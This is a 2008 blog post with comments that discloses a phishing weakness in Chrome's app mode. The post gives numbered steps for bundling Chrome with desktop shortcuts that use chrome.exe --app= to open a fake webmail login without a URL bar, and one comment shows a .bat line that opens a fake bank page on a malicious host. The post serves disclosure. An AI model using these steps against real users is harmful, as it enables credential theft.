thebeebs | Security Vulnerability with Google Chrome
thebeebs
Zeroing the desk - Ignore the design
 
 

Security Vulnerability with Google Chrome

by thebeebs 3. September 2008 02:01

Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users.

  1. Wrap the Chrome browser installation in your own InstallShield.
  2. Create a Phising Mirror of Gmail or what ever site you want to Phish.
  3. Add Desktop Shortcuts to the InstallShield which link to.
    "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
  4. Build your InstallShield.
  5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.

When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account.

As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail.

Tags:

Comments (4) -

hkm
hkm Mexico
9/3/2008 11:12:32 PM #

I also noted this issue, it is not wise to open pages without the location or certificate (SSL) information. This is an open door for spoofed pages.

A malicious user could send you a .bat file that, besides not getting detected by most AVs, contains the following code that when ran opens what -appears to be your online banking page- but is in fact a fake webpage that steals your banking credentials.

%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicious.net/fake-bank-page.html


hkm

Terence
Terence Hong Kong S.A.R.
9/4/2008 5:05:22 AM #

Hi. I have installed the Chrome yesterday and find that Silverlight is not working on Chrome (A little bit disappointed).

Anyway, are you living in UK? Do you know is there any famous Flash or Silverlight Forum in UK? (Actually, cos I want to promote my blog to Europe people).

Martin Beeby
Martin Beeby United Kingdom
9/4/2008 6:34:12 AM #

Yes I thought that was rubbish too. It sort of works but it's really buggy. I wonder what the issue is.

Yeah I live in the UK, I don't belong to any silverlight or Flash forums I'm sorry.

stratford upon avon hotels
stratford upon avon hotels United States
8/14/2011 11:39:29 AM #

Hey this is a great post. Could you keep me updated with any other info similar to this? If travelling to the UK why not stay at Stratford hotel and watch a Shakespear play

Pingbacks and trackbacks (3)+

Comments are closed